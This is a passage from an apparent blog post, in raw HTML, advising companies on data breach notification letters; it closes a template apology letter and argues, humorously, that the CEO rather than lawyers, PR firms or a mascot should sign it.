<span style="font-size: large;"><i>“Again, we apologize for this incident and any inconvenience this causes. We value your trust and we are committing all resources to resolving this incident quickly and completely, so we can get back to [insert mission statement or “what you do” here].”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>Sincerely,</i></span><br />
<span style="font-size: large;"><i>[Highest ranking person in your company]</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;">No, I’m not kidding. Your lawyer should not sign this for you. Nor should your 3rd party data breach management company. Not your PR firm, not the head of IT, and definitely not something cutesy like your mascot (even if your mascot is one of the cats in this blog post). And for crying out loud, I don’t care how big and high profile you are, don’t have the President of the United States address the nation for you either. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Before you send out this letter, run it by your public relations team/person, your general counsel/lawyer, your data breach response team, and your CEO, who as we discussed above <u>will be signing the letter</u>. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU75g2UISo2nZnLwiGZK0c4lzxQWm4NERk8OpYSS5BH8OjC7XD_fgAZxlkj4W0z-6RHG-sWO5K62kP2iGB42_MfY8qilDJP6LUZfh_50KRNzUFTHf4voYSj1_PnufhKYM-fbGZMNNUA42C/s1600/CEOKitteh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU75g2UISo2nZnLwiGZK0c4lzxQWm4NERk8OpYSS5BH8OjC7XD_fgAZxlkj4W0z-6RHG-sWO5K62kP2iGB42_MfY8qilDJP6LUZfh_50KRNzUFTHf4voYSj1_PnufhKYM-fbGZMNNUA42C/s400/CEOKitteh.png" width="352" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0